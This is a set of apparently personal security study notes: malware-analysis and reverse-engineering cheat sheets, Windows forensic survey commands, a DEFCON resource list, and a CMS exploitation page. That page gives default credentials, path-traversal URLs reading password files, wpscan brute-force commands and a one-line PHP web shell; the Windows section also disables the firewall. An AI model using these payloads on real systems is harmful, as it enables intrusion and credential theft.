15 | Renew DHCP lease. . . . . . . . . . . renew-dhcp   
16 | See current IP address. . . . . . . . myip   
17 | Edit a text file. . . . . . . . . . . . . . . . code file   
18 | View an image file. . . . . . . . . . . . feh file   
19 | Start web server. . . . . . . . . . . . . httpd start   
20 | Start SSH server. . . . . . . . . . . . . . sshd start    
21 | 
22 | ## Analyze Windows Executables
23 | Static Properties: manalyze, peframe, pefile, exiftool, clamscan, pescan, portex, bearcommander, pecheck    
24 | Strings and Deobfuscation: pestr, bbcrack, brxor.py, base64dump, xorsearch, flarestrings, floss, cyberchef    
25 | Code Emulation: binee, capa, vivbin     
26 | Disassemble/Decompile: ghidra, [cutter](https://cutter.re/), objdump, r2     
27 | Unpacking: bytehist, [de4dot](https://github.com/de4dot/de4dot), upx     
28 | 
29 | ## Reverse-Engineer Linux Binaries
30 | Static Properties: trid, exiftool, pyew, [readelf.py](https://github.com/eliben/pyelftools)     
31 | Disassemble/Decompile: ghidra, [cutter](https://cutter.re/), objdump, r2      
32 | Debugging: edb, gdb     
33 | Behavior Analysis: ltrace, strace, frida, sysdig, [unhide](https://www.unhide-forensics.info/)     
34 | 
35 | ## Investigate Other Forms of Malicious Code
36 | Android: apktool, droidlysis, [androgui.py](https://github.com/androguard/androguard), baksmali, [dex2jar](https://github.com/pxb1988/dex2jar)    
37 | Java: cfr, procyon, jad, jd-gui, [idx_parser.py](https://github.com/digitalsleuth/Java_IDX_Parser)    
38 | Python: [pyinstxtractor.py](https://github.com/extremecoders-re/pyinstxtractor), pycdc
39 | JavaScript: js, js-file, [objects.js](https://github.com/REMnux/salt-states/blob/master/remnux/config/objects/objects.js), [box-js](https://github.com/CapacitorSet/box-js)       
40 | Shellcode: [shellcode2exe.bat](https://github.com/repnz/shellcode2exe), scdbg, xorsearch     
41 | PowerShell: pwsh, base64dump    
42 | Flash: swfdump, flare, flasm, [swf_mastah.py](https://github.com/9b/pdfxray_lite), xxxswf    
43 | 
44 | ## Examine Suspicious Documents
45 | Microsoft Office Files: vmonkey, pcodedmp, olevba, xlmdeobfuscator, [oledump.py](https://blog.didierstevens.com/programs/oledump-py/), msoffice-crypt, ssview    
46 | RTF Files: rtfobj, rtfdump    
47 | Email Messages: emldump, msgconvert    
48 | PDF Files: pdfid, pdfparser, pdfextract, pdfdecrypt, peepdf, pdftk, pdfresurrect, qpdf, pdfobjflow   
49 | General: base64dump, [tesseract](https://github.com/tesseract-ocr/tesseract), exiftool   
50 | 
51 | ## Explore Network Interactions
52 | Monitoring: burpsuite, networkminer, polarproxy, mitmproxy, wireshark, tshark, ngrep, tcpxtract   
53 | Connecting: [thug](https://github.com/buffer/thug), nc, [tor](https://www.torproject.org/), wget, curl, irc, ssh, [unfurl](https://github.com/obsidianforensics/unfurl)    
54 | Services: fakedns, fakemail, [accept-all-ips](https://github.com/REMnux/distro/blob/master/files/accept-all-ips), nc, [httpd](https://nginx.org/), inetsim, fakenet, sshd, myip   
55 | 
56 | ### inetsim 
57 | Set up DNS   
58 | Edit /etc/inetsim/inetsim.conf.   
59 | Uncomment out start_service dns  
60 | dns_default_ip    REMnux_IP   
61 | 
62 | 
63 | ## Gather and Analyze Data
64 | Network: [Automater.py](http://www.tekdefense.com/automater/), shodan, [ipwhois_cli.py](https://github.com/secynic/ipwhois), pdnstool   
65 | Hashes: [malwoverview.py](https://github.com/digitalsleuth/malwoverview), nsrllookup, [Automater.py](http://www.tekdefense.com/automater/), vt, [virustotal-search.py](https://blog.didierstevens.com/programs/virustotal-tools/)     
66 | Files: yara, [scalpel](https://github.com/sleuthkit/scalpel), bulk_extractor, ioc_writer   
67 | Other: dexray, [viper](https://github.com/viper-framework/viper), [time-decode.py](https://github.com/digitalsleuth/time_decode)   
68 | 
69 | ## Other Analysis Tasks
70 | Memory Forensics: vol.py, [vol3](https://github.com/volatilityfoundation/volatility3), [linux_mem_diff.py](https://github.com/monnappa22/linux_mem_diff_tool), aeskeyfind, rsakeyfind, bulk_extractor   
71 | File Editing: wxHexEditor, scite, [code](https://code.visualstudio.com/), xpdf, [convert](https://imagemagick.org/)   
72 | File Extraction: [7z](https://www.7-zip.org/), [info-zip](http://infozip.sourceforge.net/), unrar, cabextract
73 | 
74 | ## Use Docker Containers for Analysis
75 | Thug Honeyclient: remnux/thug   
76 | JSDetox JavaScript Analysis: remnux/jsdetox   
77 | Rekall Memory Forensics: remnux/recall   
78 | RetDec Decompiler: remnux/retdec   
79 | Radare2 Reversing Framework: remnux/radare2   
80 | Ciphey Automatic Decrypter: remnux/ciphey   
81 | Viper Binary Analysis Framework: remnux/viper   
82 | REMnux in a Container: remnux/remnux-distro   
83 | 
84 | ## Interact with Docker Images  
85 | List local images. . . . . . . . . . . . . docker images   
86 | Update local image. . . . . . . . . . . docker pull image   
87 | Delete local image. . . . . . . . . . . docker rmi imageid   
88 | Delete unused resources. . . . . . docker system prune   
89 | Open a shell inside a transient container. . . . . . . . . docker run --rm -it image bash   
90 | Map a local TCP port 80 to container’s port 80 . . . . docker run --rm -it -p 80:80 image bash   
91 | Map your current directory into container. . . . docker run --rm -it -v .:dir image bash   
92 | 


--------------------------------------------------------------------------------
/Malware_Analysis/RevEng_Cheatsheet.md:
--------------------------------------------------------------------------------
  1 | Modified from SANS Poster - https://sansorg.egnyte.com/dl/pHqHxaLC5M   
  2 | # Overview of the Code Analysis Process
  3 | 1. Examine static properties of the Windows executable for initial assessment and triage.   
  4 | 2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.   
  5 | 3. Perform automated and manual behavioral analysis to gather additional details.   
  6 | 4. Emulate code execution to identify characteristics and areas for further analysis.   
  7 | 5. Use a disassembler and decompiler to statically examine code related to risky strings and APIs calls.   
  8 | 6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.   
  9 | 7. If appropriate, unpack the code and its artifacts.   
 10 | 8. As your understanding of the code increases, add comments, labels; rename functions, variables.   
 11 | 9. Progress to examine the code that references or depends upon the code you’ve already analyzed.   
 12 | 10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.   
 13 | 
 14 | # Common 32-Bit Registers and Uses   
 15 | | Register      | Full Name   | Description |
 16 | | -----------   | ----------- | ----------- |
 17 | | EAX     | Primary Accumulator       | Addition, multiplication, function results  |
 18 | | ECX     | Counter Register  | Used by LOOP and others   |
 19 | | EBP     | Extended Base Pointer  | Baseline/frame pointer for referencing function arguments (EBP+offset) and local variables (EBP-offset)     |
 20 | | ESP     | Extended Stack Pointer | Points to the current “top” of the stack; changes via PUSH, POP, and others |     
 21 | | EIP     | Extended Instruction pointer | Points to the next instruction; shellcode gets it via call/pop    |
 22 | | EFLAGS  | Flags Register | Contains flags that store outcomes of computations (e.g., Zero and Carry flags)    |
 23 | | FS      | F segment register  | FS:[0] points to SEH chain, FS:[0x30] points to the PEB.   | 
 24 | 
 25 | 16 bit registers: corresponding IP, SP and BP.   
 26 | 
 27 | # Common x86 Assembly Instructions   
 28 | | Syntax      | Description |
 29 | | ----------- | ----------- |
 30 | | mov EAX,0xB8      | Put the value 0xB8 in EAX.      |  
 31 | | push EAX |  Put EAX contents on the stack.   |
 32 | | pop EAX | Remove contents from top of the stack and put them in EAX.   |
 33 | | lea EAX,[EBP-4] | Put the address of variable EBP-4 in EAX.   |
 34 | | call EAX |  Call the function whose address resides in the EAX register.   |  
 35 | | add esp,8 | Increase ESP by 8 to shrink the stack by two 4-byte arguments.    |
 36 | | sub esp,0x54 |  Shift ESP by 0x54 to make room on the stack for local variable(s).   | 
 37 | | xor EAX,EAX | Set EAX contents to zero.   |
 38 | | test EAX,EAX |  Check whether EAX contains zero, set the appropriate EFLAGS bits.  | 
 39 | | cmp EAX,0xB8 |  Compare EAX to 0xB8, set the appropriate EFLAGS bits.   |
 40 | 
 41 | # Understanding 64-Bit Registers
 42 | EAX→RAX, ECX→RCX, EBX→RBX, ESP→RSP, EIP→RIP   
 43 | Additional 64-bit registers are R8-R15.   
 44 | RSP is often used to access stack arguments and local variables, instead of EBP.   
 45 | 
 46 | # Passing Parameters to Functions on Windows
 47 | arg0 \[EBP+8\] on 32-bit, RCX on 64-bit   
 48 | arg1 \[EBP+0xC\] on 32-bit, RDX on 64-bit   
 49 | arg2 \[EBP+0x10\] on 32-bit, R8 on 64-bit   
 50 | arg3 \[EBP+0x14\] on 32-bit, R9 on 64-bit   
 51 | 
 52 | # Decoding Conditional Jumps
 53 | JA / JG Jump if above/jump if greater.   
 54 | JB / JL Jump if below/jump if less.   
 55 | JE / JZ Jump if equal; same as jump if zero.   
 56 | JNE / JNZ Jump if not equal; same as jump if not zero.   
 57 | JGE/ JNL Jump if greater or equal; same as jump if not less.   
 58 | 
 59 | # Some Risky Windows API Calls  
 60 | https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list    
 61 | https://malapi.io/          #list of Windows API calls commonly used by malware   
 62 | 
 63 | Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses   
 64 | Dynamic DLL loading: LoadLibrary, GetProcAddress   
 65 | Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses   
 66 | Data stealing: GetClipboardData, GetWindowText     
 67 | Keylogging: GetAsyncKeyState, SetWindowsHookEx   
 68 | Embedded resources: FindResource, LockResource   
 69 | Unpacking/self-injection: VirtualAlloc, VirtualProtect   
 70 | Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx   
 71 | Execute a program: WinExec, ShellExecute, CreateProcess   
 72 | Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile   
 73 | 
 74 | API Call	Explanation
 75 | LoadLibraryA
 76 | 	Maps a specified DLL  into the address space of the calling process
 77 | GetUserNameA
 78 | 	Retrieves the name of the user associated with the current thread
 79 | GetComputerNameA
 80 | 	Retrieves a NetBIOS or DNS  name of the local computer
 81 | GetVersionExA
 82 | 	Obtains information about the version of the operating system currently running
 83 | GetModuleFileNameA
 84 | 	Retrieves the fully qualified path for the file of the specified module and process
 85 | GetStartupInfoA
 86 | 	Retrieves contents of STARTUPINFO structure (window station, desktop, standard handles, and appearance of a process)
 87 | GetModuleHandle
 88 | 	Returns a module handle for the specified module if mapped into the calling process's address space
 89 | GetProcAddress
 90 | 	Returns the address of a specified exported DLL  function
 91 | VirtualProtect
 92 | 	Changes the protection on a region of memory in the virtual address space of the calling process   
 93 | 
 94 | # Additional Code Analysis Tips
 95 | Be patient but persistent; focus on small, manageable code areas and expand from there.   
 96 | Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.   
 97 | Look at jumps and calls to assess how the specimen flows from "interesting" code block to the other.   
 98 | If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.   
 99 | When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).    
100 | 


--------------------------------------------------------------------------------
/Web/CMS.md:
--------------------------------------------------------------------------------
  1 | # CMS Specific Vulnerabilities and Exploits    
  2 | ## Contents  
  3 | - [CMS Specific Vulnerabilities and Exploits](#cms-specific-vulnerabilities-and-exploits)
  4 |   * [Contents](#contents)
  5 |     + [Default Creds](#default-creds)
  6 |     + [Adobe Coldfusion](#adobe-coldfusion)
  7 |     + [Elastix](#elastix)
  8 |     + [Drupal](#drupal)
  9 |     + [JBoss](#jboss)
 10 |     + [Jenkins](#jenkins)
 11 |     + [Joomla ](#joomla)
 12 |     + [PHPMyAdmin](#phpmyadmin)
 13 |     + [Tomcat](#tomcat)
 14 |     + [Webmin](#webmin)
 15 |     + [Wordpress](#wordpress)
 16 | 
 17 | 
 18 | [CMS RCE Techniques](https://github.com/p0dalirius/Awesome-RCE-techniques)    
 19 | ### Default Creds 
 20 | 
 21 |     https://cirt.net/passwords
 22 |     https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
 23 |     
 24 | ### Adobe Coldfusion 
 25 | https://nets.ec/Coldfusion_hacking   
 26 | https://www.drchaos.com/post/a-walk-down-adversary-lane-coldfusion-v8
 27 | 
 28 |     Metasploit - Determine version
 29 |     /CFIDE/adminapi/base.cfc?wsdl
 30 |     Version 8 Vulnerabilities
 31 |     Fckeditor: use exploit/windows/http/coldfusion_fckeditor
 32 | 
 33 | LFI 
 34 | 
 35 |     http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
 36 | 
 37 | ### Elastix 
 38 | 
 39 |     default login are admin:admin at /vtigercrm/
 40 |     able to upload shell in profile-photo
 41 |     Examine configuration files - Generic
 42 |     Examine httpd.conf/ windows config files 
 43 |     
 44 | ### Drupal
 45 | [droopsescan](https://github.com/droope/droopescan) 
 46 | CVE-2018-7600 - Drupalgeddon 2: RCE for Drupal 7.x and 8.x    
 47 | 
 48 |     /CHANGELOG.txt to find version
 49 | 
 50 | ### JBoss
 51 | 
 52 |     JMX Console http://IP:8080/jmxconcole/
 53 |     WAR File payload   
 54 | 
 55 | ### Jenkins
 56 | [pwn jenkins](https://github.com/Scr1ptK1ddie/pwn_jenkins)   
 57 | 
 58 | ### Joomla 
 59 | Use [joomscan](https://github.com/OWASP/joomscan) to find vulns and misconfigs.   
 60 | 
 61 |     admin page: /administrator
 62 |     other pages: configuration.php, diagnostics.php, joomla.inc.php, config.inc.php   
 63 |     
 64 | ### PHPMyAdmin
 65 | 
 66 |     Default password root:root, pma:
 67 |     Brute force with Burp or phpmyadmin python script
 68 | 
 69 | ### Tomcat 
 70 | 
 71 |     Usually port 8080, /manager
 72 |     default creds tomcat:s3cret
 73 |     generate WAR reverse shell payload, upload and deploy 
 74 | ### Webmin    
 75 | Port 10000, default creds are admin:admin   
 76 | Without creds:        
 77 | Webmin version<2.37 is vulnerable to remote code execution, some versions may not be vulnerable in a default install.
 78 | [CVE-2019-15107](https://github.com/MuirlandOracle/CVE-2019-15107)     
 79 | Webmin 1.882 to 1.921: Remote Command Execution CVE-2019-15231 
 80 | 
 81 | With creds:      
 82 | Authenticated RCE through v1.920 [CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)  
 83 | Webmin 1.900 - Authenticated RCE Metasploit module   
 84 | 
 85 |     Use "Java File Manager" > /updown/upload.cgi to upload a .cgi file        
 86 |             
 87 | ### Wordpress  
 88 | https://github.com/wpscanteam/wpscan/wiki/WordPress-Plugin-Security-Testing-Cheat-Sheet    
 89 | https://raphaelrichard-sec.fr/learning-notes/hacking-wordpress     
 90 | [Hacking Wordpress Notes](https://github.com/cyberteach360/Hacking-Wordpress)    
 91 | .wp-config.php.swp exploit - https://ritcsec.wordpress.com/2020/04/28/how-i-accidentally-discovered-cve-2017-17087-2/         
 92 | [Wordpress Fuzzing List](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/wordpress.fuzz.txt)      
 93 | 
 94 |     admin and login pages:  /wp-admin    /wp-login     /wp-admin/login.php   /login.php    /wp-login.php     
 95 |     config files:  /setup-config.php   /wp-config.php    
 96 |     curl http://10.10.10.10/wordpress/ | grep 'content="WordPress'  #get WordPress version   
 97 |     curl -s -X GET http://10.10.10.10/wordpress | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2    #get plugins     
 98 |     curl -s -X GET http://10.10.10.10 | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2   #get themes    
 99 |     curl http://10.10.10.10/wp-json/wp/v2/users | jq    #user enum   
100 | wpscan 
101 | Register for a free account and get an API token from https://wpscan.com/    
102 | 
103 |     wpscan --url <domain>
104 |     wpscan --url <domain> --enumerate ap at (All Plugins, All Themes)
105 |     wpscan --url <domain> --enumerate u (Usernames)       #or zoom.py 
106 |     wpscan --url <domain> --enumerate v      
107 |     wpscan --url http://10.10.10.10/wordpress --enumerate --api-token <API_TOKEN>
108 |     wpscan -u 192.168.0.15 --enumerate -t --enumerate u --enumerate p      
109 | 
110 | Bruteforce login page with wpscan   
111 | Xmlrpc method is usually faster (if enabled), but is not as reliable.            
112 | 
113 |     wpscan --url ipaddress --usernames name_list --passwords wordlist    
114 |     wpscan --password-attack xmlrpc -t 20 -U admin, username -P passwords.txt --url http://10.10.10.10           
115 | 
116 | Xmlrpc.php - if enabled you may be able to use this to brute force creds. Send the below request to check    
117 | If wp.getUserBlogs, wp.getCategories or metaWeblog.getUsersBlogs are available - can brute force    
118 | Ref: https://gist.github.com/georgestephanis/5681982    
119 | ```
120 | POST /wordpress/xmlrpc.php HTTP/1.1
121 | Host: 10.10.10.10
122 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
123 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
124 | Accept-Language: en-US,en;q=0.5
125 | Accept-Encoding: gzip, deflate
126 | Connection: close
127 | Cookie: wordpress_test_cookie=WP%20Cookie%20check
128 | Upgrade-Insecure-Requests: 1
129 | Content-Length: 91
130 | 
131 | <methodCall>
132 | <methodName>system.listMethods</methodName>
133 | <params></params>
134 | </methodCall>
135 | ```   
136 | Vulnerable Mail Masta Plugin Exploit        
137 | 
138 |     curl http://10.10.10.10/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd     
139 |     /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd    
140 |     
141 | RCE via Theme Editor using Admin Creds    
142 | Login, select Appearance on the side panel and select Theme Editor to modify the PHP source code. Select an inactive theme to avod breaking the main theme.    
143 | Add to below to theme 404 page then access it (probably) here: http://10.10.10.10/wordpress/wp-content/themes/twentytwenty/404.php     
144 | 
145 |     <?php system($_GET["cmd"]); ?>
146 |     exploit/unix/webapp/wp_admin_shell_upload    #or use this metasploit exploit   
147 | 


--------------------------------------------------------------------------------
/Digital_Forensics/Windows_Survey.md:
--------------------------------------------------------------------------------
  1 | # Windows Survey Commands   
  2 | Commands to survey a box or look for malicious activity.    
  3 | Common persistence methods: services, scheduled tasks, autoruns, startup folders, WMI events.  
  4 | Reference Windows_Forensics.md for more in depth host analysis.    
  5 | 
  6 | - [Windows Survey Commands](#windows-survey-commands)
  7 |   * [Network Usage](#network-usage)
  8 |   * [Processes](#processes)
  9 |   * [Services](#services)
 10 |   * [Registry](#registry)
 11 |   * [User Accounts](#user-accounts)
 12 |   * [Scheduled Tasks](#scheduled-tasks)
 13 |   * [WMI Events](#wmi-events)
 14 |   * [Firewalls](#firewalls)
 15 |   * [Binary Analysis](#binary-analysis)
 16 |   * [SMB Shares](#smb-shares)
 17 |   
 18 | ## Network Usage    
 19 | Suspicious connections: look for multiple outbound connections, strange behavior, long HTTP or HTTPS sessions, techniques or known malicious IOCS.     
 20 | Network traffic indicators: long connections, consistent packet intervals, consistent data sizes (heartbeat checking), consistent packet intervals within a jitter metric (skew)       
 21 | 
 22 |     netstat.exe -nao
 23 |     PS > Get-NetTCPConnection -State Listen | Select-Object -Property LocalAddress, LocalPort, State, OwningProcess   
 24 |     PS > Get-NetTCPConnection -RemoteAddress 192.168.10.0 | Select-Object CreationTime, LocalAddress, LocalPort, Remote Address, RemotePort, OwningProcess, State    #info from a remote system   
 25 |     PS > Get-Process | Select-Object -Property Path, Name, Id | Where-Object -Property Id -eq 1111    #get PID from netstat then lookup process   
 26 |     
 27 | ## Processes    
 28 | Suspicious processes: look for weird names or activity, non-standard path, weird parent / child relationships, base64 encoded command line options.         
 29 | 
 30 |     wmic.exe process   
 31 |     PS > Get-Process 'name*' | select -object *   
 32 |     PS > Get-Process -ComputerName Remote     #get process info from a remote computer   
 33 |     PS > Get-Process | Select-Object -Property Path, Name, Id    #look for IOCs   
 34 |     PS > Get-Process | Select-Object -Property Path, Name, Id | Where-Object -Property Name -eq name   #look at specific process    
 35 |     PS > Get-CimInstance -Class win32_process | select-object ProcessId, ProcessName,CommandLine   #more detailed info - command used to run    
 36 |     PS > Get-CimInstance -Class win32_process | Where-Object -Property ParentProcessID -EQ 644  #parent proc info  
 37 |     
 38 | ## Services 
 39 | Services: common persistence method.   
 40 | 
 41 |     net start                         #installed and started services 
 42 |     sc.exe query 
 43 |     wmic service where "name like 'service'" get Name,PathName        #more info on a service 
 44 |     PS > Get-Process -Name service  
 45 |     PS > Get-CimInstance -ClassName win32_service | Format-List Name,Caption,Description,PathName   #get path to program
 46 |     #view logs: new service installed
 47 |     wevutil.exe  
 48 |     PS > Get-WinEvent -LogName System | Where-Object -Property Id -EQ 7045 | Format-List -Property TimeCreated, Message   
 49 |     
 50 |  ## Registry   
 51 |  HKLM and HKCU are hives on disk. Look for autoruns (ASEP) and startup folders.      
 52 |  
 53 |      reg.exe  
 54 |      PS > Get-ChildItem 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall' | Select-Object PSChildName
 55 |      PS > Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   #local machine startup 
 56 |      PS > Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 
 57 |      PS > Get-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   #user startup
 58 |      PS > Get-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 
 59 |    
 60 |  ## User Accounts 
 61 |  Look for new weird accounts in the admins group.    
 62 |  
 63 |      net.exe user  
 64 |      net.exe localgroup 
 65 |      PS > Get-LocalGroup Administrators   
 66 |      
 67 |  ## Scheduled Tasks 
 68 |  
 69 |      schtasks.exe 
 70 |      PS > Get-ScheduledTask *Name* | Select-Object -Property TaskName    
 71 |      PS > Export-ScheduledTask -TaskName 'Name'   #get more info and see XML file    
 72 |      PS > Get-ScheduledTaskInfo -TaskName 'Name' | select-object LastRunTime    #see last time ran
 73 | ## WMI Events  
 74 | 
 75 |     PS > Get-WMIObject -Namespace root\Subscription -Class __EventFilter | fl -propertyquery #look for WMI persistence mechanisms     
 76 |     
 77 | ## Firewalls    
 78 |  
 79 |     netsh firewall show state 
 80 |     netsh firewall show config   
 81 |     PS > Get-NetFirewallProfile | Format-Table Name, Enabled  
 82 |     PS > Get-NetFirewallRule | select DisplayName, Enabled, Description #firewall rules 
 83 |     PS > Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False       #disable firewall (if admin)   
 84 |     
 85 | ## Binary Analysis 
 86 | Pull binary and associated files for further analysis in a sandbox. Collect memory (if able / applicable).   
 87 | 
 88 |     PS > Get-FileHash file     #sha256 hash  
 89 |     PS > strings file          #using SysInternals tool 
 90 |     PS > winpmem_mini.exe image.raw     #perform a memory capture 
 91 |     
 92 | ## SMB Shares   
 93 | View remote shares:   
 94 | 
 95 |      PS > Get-WmiObject -Class win32_share -ComputerName ip         
 96 |      net view /all \\server 
 97 | View local shares: 
 98 | 
 99 |      PS > Get-SMBShare                                                                               
100 |      net share 
101 | Connect SMB share:    
102 | 
103 |     PS:> New-SmbMapping -LocalPath X: -RemotePath \\server\sharename     
104 |     net use \\server\sharename 
105 | View inbound connections:   
106 | 
107 |     PS:> Get-SmbSession                                                             
108 |     net session 
109 | Drop inbound connections:   
110 | 
111 |     PS:> Close-SmbSession                                                               
112 |     net session \\server /del   
113 | View outbound SMB mapped connections: 
114 | 
115 |     PS:> Get-SmbMapping                                        
116 |     net use 
117 | Drop outbound SMB connections:    
118 | 
119 |     PS:> Remove-SmbMapping -Force                                     
120 |     net use * /del    
121 |     
122 |  ## Logging 
123 |  Event Ids to check for persistence: 4624, 4634, 4672, 4732, 4688, 4697     
124 |  4624: successful logon to local computer, Security log.     
125 | 	4634: Account was logged off, Security log.     
126 | 	4672: User with administrator privileges logs on, Security log.     
127 | 	4732: User added to a security-enabled local group, Security log.    
128 | 	4688: New process created.     
129 | 	4697: Service installed on the system (possible persistence).     
130 | 
131 |  
132 |      PS> Get-WinEvent -LogName System | Where-Object -Property Id -EQ 7045 | Format-List -Property TimeCreated, Message #new service installed      
133 | 


--------------------------------------------------------------------------------
/Resources/DEFCON29.md:
--------------------------------------------------------------------------------
  1 | [DEFCON Media](https://media.defcon.org/)    
  2 | 
  3 | ## Workshops 
  4 | 
  5 | https://github.com/eigentourist/defcon29     (Intro to ASM)  
  6 | https://github.com/surya4n6/dc29-btv-2021 (Windows Forensics 101)  
  7 | https://hunt-for-red-apples.gitbook.io/hunt-for-red-apples/  (Threat Hunting on MAC OS)  
  8 | https://media.blueteamvillage.org/Workshops/   (Malware Analysis workshop and others)     
  9 | https://labs.iotvillage.org/  (Quick online labs) 
 10 | https://samsclass.info/workshops.htm (Collection of free workshops)   
 11 | https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation (Beginners Guide to Obfuscation on Windows)   
 12 | [https://www.blackhillsinfosec.com/webcast-no-span-port-no-tap-no-problem/](No Port, No Span, No Problem) and [Guide](https://github.com/straysheep-dev/network-visibility)   
 13 | 
 14 | ## Talks
 15 | https://www.youtube.com/user/DEFCONConference    
 16 | https://www.youtube.com/redteamvillage   
 17 | https://www.youtube.com/c/blueteamvillage  
 18 | https://www.youtube.com/c/reconvillage/live   
 19 | https://www.youtube.com/channel/UCOhn9WALnpb5YAbW18R1Hzg (Adversay Village)    
 20 | 
 21 | 
 22 | ## Red Team 
 23 | https://www.ired.team/  
 24 | https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki   
 25 | https://github.com/enaqx/awesome-pentest  
 26 | https://github.com/pe3zx/my-infosec-awesome  
 27 | https://www.youtube.com/watch?v=tVgJ-9FJKxE   
 28 | https://github.com/Hack-with-Github/Awesome-Hacking   
 29 | 
 30 | 
 31 | ## Windows Command Line Obfuscation
 32 | https://github.com/wietze/windows-command-line-obfuscation      
 33 | https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
 34 | 
 35 | 
 36 | ## Digital Forensics  
 37 | https://www.youtube.com/c/HackingexposedcomputerforensicsblogBlogspot     
 38 | https://github.com/strontic/xcyclopedia   
 39 | https://dfir.science/2017/12/Getting-started-in-Digital-Forensics.html    
 40 | https://digitalcorpora.org/     
 41 | https://www.youtube.com/c/HackingexposedcomputerforensicsblogBlogspot   
 42 | 
 43 | 
 44 | ## Incidence Response 
 45 | https://github.com/ch33r10/DEFCON29-BTV-ThreatReportRoulette/blob/main/README.md    
 46 | https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg      
 47 | https://github.com/meirwah/awesome-incident-response      
 48 | https://www.dfir.training/      
 49 | https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/      
 50 | https://github.com/fireeye/red_team_tool_countermeasures
 51 | https://www.sans.org/tools/ez-tools/ 
 52 | 
 53 | ## Bug Bounty    
 54 | [Bug Bounty Basics](https://docs.google.com/presentation/d/1MWWXXRvvesWL8V-GiwGssvg4iDM58_RMeI_SZ65VXwQ/edit#slide=id.p)     
 55 | [Top Routinely Exploited CVEs](https://us-cert.cisa.gov/ncas/alerts/aa21-209a)   
 56 | [Bug crowd University](https://github.com/bugcrowd/bugcrowd_university)   
 57 | [Beginner Bug Bounty Resources](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters)  
 58 | Live Recon and Distributed Recon Automation Using Axiom with @pry0cc (https://bit.ly/3gPsonz)  
 59 | The Bug Hunter's Methodology Full 2-hour Training by Jason Haddix (https://bit.ly/2PzHUsr)  
 60 | Finding Your First Bug: Choosing Your Target by InsiderPhD (https://bit.ly/3uiF3n7)  
 61 | HOW TO GET STARTED IN BUG BOUNTY (9x PRO TIPS) by STÖK (https://bit.ly/3u81U4m) 
 62 | 
 63 | The Web Application Hacker's Handbook, 2nd Edition     
 64 | Hands-On Bug Hunting for Penetration Testers (Joseph E. Marshall)    
 65 | Web Hacking 101 (Peter Yaworski)
 66 | 
 67 | 
 68 | ## Reverse Engineering   
 69 | ### Learn   
 70 | https://jhalon.github.io/reverse-engineering-protocols/    
 71 | https://github.com/rshipp/awesome-malware-analysis#books    
 72 | https://www.malware-traffic-analysis.net/index.html    
 73 | https://resources.infosecinstitute.com/topic/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/  
 74 | https://github.com/vxunderground/VXUG-Papers   
 75 | https://github.com/ytisf/theZoo   
 76 | https://securityboulevard.com/2020/06/must-have-free-resources-for-malware-analysis/    
 77 | https://malwareunicorn.org/workshops/re101.html#0    
 78 | https://filipipires.com/tabs/presentations/    
 79 | https://zeltser.com/malware-analysis-cheat-sheet/    
 80 | 
 81 | ### CTFs / Practice  
 82 | crackmes.one https://crackmes.one/   
 83 | Reverse Engineering challenges https://challenges.re/    
 84 | Embedded Security CTF https://microcorruption.com/    
 85 | Beginner Malware Reversing Challenges https://www.malwaretech.com/beginner-malware-reversing-challenges    
 86 | RingZer0 https://ringzer0ctf.com/challenges    
 87 | Reversing.kr http://reversing.kr/index.php    
 88 | CTF Reversing Challenges List https://github.com/N4NU/Reversing-Challenges-List    
 89 | Reverse engineering challenges https://github.com/3XPL017/Reversing-Challenges   
 90 | Latest Reverse Engineering Challenges https://0x00sec.org/c/reverse-engineering/challenges/    
 91 | RE CTFd https://reversing.ctfd.io/challenges   
 92 |  
 93 | 
 94 | ## Exploit Developement  
 95 | ### Courses 
 96 | Course materials for Modern Binary Exploitation by RPISEC - https://github.com/RPISEC/MBE   
 97 | Learn ROP - https://ropemporium.com/   
 98 | For Linux binary Exploitation - https://github.com/scwuaptx/HITCON-Training  
 99 | Intro to binary exploitation / reverse engineering course - https://guyinatuxedo.github.io/   
100 | A set of Linux binary exploitation tasks for beginners on various architectures - https://github.com/xairy/easy-linux-pwn 
101 | ASM Basics - https://asmtutor.com/#lesson1    
